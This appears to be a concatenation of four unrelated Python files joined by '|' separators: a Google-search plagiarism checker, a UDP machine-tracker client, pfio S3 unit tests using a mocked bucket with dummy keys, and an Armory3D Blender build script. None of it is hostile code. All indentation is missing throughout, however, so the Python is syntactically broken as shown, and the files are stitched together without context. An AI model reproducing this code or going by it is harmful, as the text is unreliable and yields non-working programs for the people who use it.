import re
import googlesearch
import threading
import time
from PlagiarismChecker.similarity import bagOfWordsSim, substringMatching
def createQueries(text, n_grams=False):
"""Processes the input text and generates queries that will be Googled.
Parameters
----------
text: str
The input text that is to be processed.
n_grams: int
The maximum number of words each query can have.
"""
if n_grams:
n = 9
words = text.split(" ")
tokenized_sentences = []
for idx in range(len(words) // n):
tokenized_sentences.append(words[idx * n : (idx + 1) * n])
tokenized_sentences.append(words[(len(words) // n) * n :])
else:
sentenceEnders = re.compile("[.!?]")
sentences = sentenceEnders.split(text)
tokenized_sentences = []
for sentence in sentences:
x = re.compile(r"\W+", re.UNICODE).split(sentence)
x = [ele for ele in x if ele != ""]
tokenized_sentences.append(x)
final_query = []
for sentence in tokenized_sentences:
if sentence:
final_query.append(sentence)
return final_query
def searchGoogle(query, num_results=3):
"""Uses Google Search to fetch urls relevant to the query.
Parameters
----------
query: str
query to be searched.
"""
response = googlesearch.search(
query, tld="com", lang="en", num=num_results, stop=num_results, pause=0
)
urls = []
for url in response:
urls.append(url)
return urls
def PlagCheck(text, n_grams=False):
search_width = 2
queries = createQueries(text, n_grams)
queries = [" ".join(word) for word in queries]
result = []
for query in queries:
start = time.time()
urls = searchGoogle(query, search_width)
match = [False] * len(urls)
jobs = []
for i in range(len(urls)):
if not n_grams:
thr = threading.Thread(
target=substringMatching, args=(query, urls[i], match, i)
)
else:
thr = threading.Thread(
target=bagOfWordsSim, args=(query, urls[i], match, i)
)
jobs.append(thr)
thr.start()
for thr in jobs:
thr.join()
temp_dict = None
for idx in range(len(urls)):
if match[idx]:
temp_dict = {"sentence": query, "match": urls[idx]}
break
if temp_dict:
result.append(temp_dict)
end = time.time()
duration = end - start
if duration < 2:
time.sleep(2.1 - duration)
final_result = []
for i in range(len(result)):
if i == 0:
final_result.append(result[i])
elif result[i]["match"] == result[i - 1]["match"]:
final_result[-1]["sentence"] = (
final_result[-1]["sentence"] + result[i]["sentence"]
)
else:
final_result.append(result[i])
return final_result
|
client.py
|
#!/usr/bin/env python
'''
Machine tracker client. Connects to server and sends
coordinates
'''
import networking as nt
import socket
import threading
import time
import logging
def get_new_data():
return nt.get_ip_address(nt.interface) + ' time is ' + str(time.time())
def discover_server(client_port, got_server_event, end_event, normal_search_time=1,found_search_time=15):
logger = logging.getLogger(__name__)
# Open discovery socket
disc_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
disc_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Get broadcast address
bcast_addr = nt.get_broadcast(nt.interface)
my_ip = nt.get_ip_address(nt.interface)
# Bind to rondevous port
#disc_socket.bind((bcast_addr,nt.r_port))
#ip,port = disc_socket.getsockname()
message = nt.make_message(nt.client_msg['discovery_request'],(my_ip,client_port))
logger.info('Starting server discover')
while not end_event.isSet():
disc_socket.sendto(message,(bcast_addr,nt.r_port))
logger.debug("Sent discovery request to "+ bcast_addr + ' ' + str(nt.r_port))
if got_server_event.isSet() == False:
# "Flood" broadcast if we haven't found a server yet
time.sleep(normal_search_time)
else:
# Sleep longer if we already have made a handshake
time.sleep(found_search_time)
return
class main_state_machine():
def search_for_server(self):
self.logger.debug('Search state')
# timeout should be the search time on the discover
self.rx_socket.settimeout(self.search_time)
while not self.end_event.isSet():
try:
data = self.rx_socket.recv(1500)
except socket.timeout:
# Try again
continue
# timeout didn't occurr
if nt.is_server_discovery_reply(data):
self.got_reply_event.set()
self.server_ip, self.server_port, self.interval = nt.known_msg_parse(data)
return 'connect'
def connect_to_server(self):
self.logger.debug('Connect State')
# Close it if it's open
if type(self.tx_socket) != type(None):
self.tx_socket.close()
# Open the socket
self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return 'change'
def send_data(self):
self.logger.debug('Send State')
msg = nt.make_message(nt.client_msg['new_data'],(get_new_data(),))
self.tx_socket.sendto(msg,(self.server_ip,int(self.server_port)))
return 'wait'
def wait_for_interval(self):
self.logger.debug('Wait State')
try:
data = self.rx_socket.recv(1500)
except socket.timeout:
return 'send'
# We got data
if nt.is_server_discovery_reply(data):
self.server_ip, self.server_port, self.interval = nt.known_msg_parse(data)
return 'connect'
elif nt.is_server_interval_change(data):
self.interval = nt.known_msg_parse(data)
return 'change'
elif nt.is_server_refresh(data):
return 'send'
elif nt.is_server_exit(data):
return 'exit'
else:
return 'wait'
def change_interval(self):
self.logger.debug('Interval change state')
self.rx_socket.settimeout(int(self.interval))
return 'wait'
def exit(self):
self.logger.debug('Exit state')
self.end_event.set()
return
def machine(self,initial_state):
self.logger.info('Starting state machine')
# Initial state is search
next_state = initial_state
while not self.end_event.isSet():
next_state = self.state[next_state](self)
self.logger.debug('State machine exiting')
return
def __init__(self,search_time,slow_search_time,end_event):
self.logger = logging.getLogger(__name__)
self.logger.debug('Main Init')
# Open recieve socket
self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.rx_socket.bind((nt.get_ip_address(nt.interface),0))
self.rx_port = self.rx_socket.getsockname()[1]
# Set empty TX socket
self.tx_socket = None
self.got_reply_event = threading.Event()
self.end_event = end_event
self.search_time = search_time
self.slow_search_time = slow_search_time
search_thread_args = (self.rx_port,self.got_reply_event,self.end_event,)
serach_thread_kwargs = {'normal_search_time':search_time,'found_search_time':slow_search_time}
# Start search
self.search_thread = threading.Thread(target=discover_server,args=search_thread_args,kwargs=serach_thread_kwargs)
self.search_thread.start()
self.machine('search')
return
state = {'search':search_for_server,
'connect':connect_to_server,
'send':send_data,
'wait':wait_for_interval,
'change':change_interval,
'exit':exit}
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(filename)s:%(lineno)s\t%(levelname)s: %(message)s',level=logging.DEBUG)
logger = logging.getLogger(__name__)
logger.warning('test')
# Figure out what interface to use - from the user
nt.interface = 'eth0'
end_event = threading.Event()
try:
main_state_machine(1,15,end_event)
print('Clean exit... Please wait.')
except Exception as e:
logger.error(str(e))
logger.error('Got kill... Please wait 15 seconds.')
end_event.set()
|
test_s3.py
|
import multiprocessing as mp
import os
import pickle
import tempfile
import pytest
from moto import mock_s3
from pfio.v2 import S3, from_url, open_url
from pfio.v2.fs import ForkedError
@mock_s3
def test_s3():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
assert bucket == s3.bucket
assert '/base' == s3.cwd
assert key == s3.aws_access_key_id
assert secret == s3.aws_secret_access_key
assert s3.endpoint is None
with s3.open('foo.txt', 'w') as fp:
fp.write('bar')
assert not fp.closed
with s3.open('foo.txt', 'r') as fp:
assert 'bar' == fp.read()
assert not fp.closed
with s3.open('foo.txt', 'rb') as fp:
assert b'b' == fp.read(1)
assert b'a' == fp.read(1)
assert b'r' == fp.read(1)
assert b'' == fp.read(1)
assert b'' == fp.read(1)
fp.seek(1)
assert b'a' == fp.read(1)
assert b'r' == fp.read(1)
assert b'' == fp.read(1)
assert not fp.closed
assert ['foo.txt'] == list(s3.list())
assert [] == list(s3.list('base'))
assert [] == list(s3.list('base/'))
assert ['foo.txt'] == list(s3.list('/base'))
assert ['foo.txt'] == list(s3.list('/base/'))
assert ['foo.txt'] == list(s3.list(recursive=True))
assert ['base/foo.txt'] == list(s3.list('/', recursive=True))
with s3.open('dir/foo.txt', 'w') as fp:
fp.write('bar')
assert not fp.closed
assert ['dir/', 'foo.txt'] == list(s3.list())
assert not s3.isdir("foo.txt")
assert s3.isdir(".")
assert s3.isdir("/base/")
assert s3.isdir("/base")
assert not s3.isdir("/bas")
def f(s3):
try:
s3.open('foo.txt', 'r')
except ForkedError:
pass
else:
pytest.fail('No Error on Forking')
p = mp.Process(target=f, args=(s3,))
p.start()
p.join()
assert p.exitcode == 0
def g(s3):
try:
with S3(bucket='test-dummy-bucket',
aws_access_key_id=key,
aws_secret_access_key=secret) as s4:
with s4.open('base/foo.txt', 'r') as fp:
fp.read()
except ForkedError:
pytest.fail('ForkedError')
p = mp.Process(target=g, args=(s3,))
p.start()
p.join()
assert p.exitcode == 0
@mock_s3
def test_s3_mpu():
# Test multipart upload
bucket = 'test-mpu'
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True, mpu_chunksize=8*1024*1024,
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
with s3.open('testfile', 'wb') as fp:
for _ in range(4):
fp.write(b"01234567" * (1024*1024))
with s3.open('testfile', 'rb') as fp:
data = fp.read()
assert 8 * 1024 * 1024 * 4 == len(data)
assert b"01234567" == data[:8]
with s3.open('testfile2', 'wb') as fp:
for _ in range(4):
fp.write(b"0123456" * (1024*1024))
with s3.open('testfile2', 'rb') as fp:
data = fp.read()
assert 7 * 1024 * 1024 * 4 == len(data)
assert b"0123456" == data[7:14]
with s3.open('testfile2', 'w') as fp:
for _ in range(4):
fp.write("0123456" * (1024*1024))
with s3.open('testfile2', 'r') as fp:
data = fp.read()
assert 7 * 1024 * 1024 * 4 == len(data)
assert "0123456" == data[7:14]
def touch(s3, path, content):
with s3.open(path, 'w') as fp:
fp.write(content)
assert s3.exists(path)
@mock_s3
def test_s3_recursive():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
touch(s3, 'foo.txt', 'bar')
touch(s3, 'bar.txt', 'baz')
touch(s3, 'baz/foo.txt', 'foo')
assert 3 == len(list(s3.list(recursive=True)))
abspaths = list(s3.list('/', recursive=True))
assert 3 == len(abspaths)
for p in abspaths:
assert p.startswith('base/')
def _seek_check(f):
# Seek by absolute position
###########################
assert f.seek(0, os.SEEK_SET) == 0 and f.read() == b'0123456789'
assert f.seek(5, os.SEEK_SET) == 5 and f.read() == b'56789'
assert f.seek(15, os.SEEK_SET) == 15 and f.read() == b''
with pytest.raises(OSError) as err:
f.seek(-1, os.SEEK_SET)
assert err.value.errno == 22
assert f.tell() == 15, "the position should be kept after an error"
# Relative seek
###############
f.seek(0, os.SEEK_SET) # back to the start
assert f.seek(5, os.SEEK_CUR) == 5
assert f.seek(3, os.SEEK_CUR) == 8
assert f.seek(4, os.SEEK_CUR) == 12
assert f.seek(-1, os.SEEK_CUR) == 11
f.seek(0, os.SEEK_SET)
with pytest.raises(OSError) as err:
f.seek(-1, os.SEEK_CUR)
assert err.value.errno == 22
assert f.tell() == 0, "the position should be kept after an error"
# Seek from the tail
####################
assert f.seek(0, os.SEEK_END) == 10
assert f.seek(-2, os.SEEK_END) == 8
assert f.seek(2, os.SEEK_END) == 12
with pytest.raises(OSError) as err:
f.seek(-11, os.SEEK_END) == 0
assert err.value.errno == 22
assert f.tell() == 12, "the position should be kept after an error"
@mock_s3
def test_s3_seek():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
# Make a 10-bytes test data
touch(s3, 'foo.data', '0123456789')
with open_url('s3://test-dummy-bucket/base/foo.data', 'rb',
aws_access_key_id=key,
aws_secret_access_key=secret) as f:
_seek_check(f)
# Make sure the seek behavior is same as normal file-like objects.
with tempfile.NamedTemporaryFile() as tmpf:
# Make the same 10-bytes test data on local filesystem
with open(tmpf.name, 'wb') as f:
f.write(b'0123456789')
# Open and check its seek behavior is identical
with open(tmpf.name, 'rb') as f:
_seek_check(f)
@mock_s3
def test_s3_pickle():
bucket = "test-dummy-bucket"
key = "it's me!deadbeef"
secret = "asedf;lkjdf;a'lksjd"
with S3(bucket, create_bucket=True):
with from_url('s3://test-dummy-bucket/base',
aws_access_key_id=key,
aws_secret_access_key=secret) as s3:
with s3.open('foo.pkl', 'wb') as fp:
pickle.dump({'test': 'data'}, fp)
with open_url('s3://test-dummy-bucket/base/foo.pkl', 'rb',
aws_access_key_id=key,
aws_secret_access_key=secret) as f:
assert pickle.load(f) == {'test': 'data'}
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
wrd = bpy.data.worlds['Arm']
print('\n' + '_' * 10 + ' [Armory] Compiling ' + '_' * 10)
if wrd.arm_verbose_output:
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if not wrd.arm_cache_build:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
# have a "zoo" collection in the current scene
export_coll = bpy.data.collections.new("export_coll")
bpy.context.scene.collection.children.link(export_coll)
for scene in bpy.data.scenes:
if scene == bpy.context.scene: continue
for o in scene.collection.all_objects:
if o.type == "MESH" or o.type == "EMPTY":
if o.name not in export_coll.all_objects.keys():
export_coll.objects.link(o)
depsgraph = bpy.context.evaluated_depsgraph_get()
bpy.data.collections.remove(export_coll) # destroy "zoo" collection
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
ArmoryExporter.export_scene(bpy.context, asset_path, scene=scene, depsgraph=depsgraph)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
if wrd.arm_verbose_output:
print('Exported modules: ' + str(modules))
print('Shader flags: ' + str(defs))
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
if not wrd.arm_verbose_output:
cmd.append("--quiet")
else:
print("Using project from " + arm.utils.get_fp())
print("Running: ", cmd)
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear(clear_warnings=True)
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if log.num_warnings > 0:
print(f'{log.num_warnings} warnings occurred during compilation!')
if state.proc_build is None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
ArmoryExporter.export_scene(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.extend(('--shaderversion', '330', '--parallelAssetConversion', '4',
'--to', arm.utils.build_dir() + '/debug', '--nohaxe', '--noproject'))
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
krom_location, krom_path = arm.utils.krom_paths()
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Disabled':
cmd.append('--nosound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
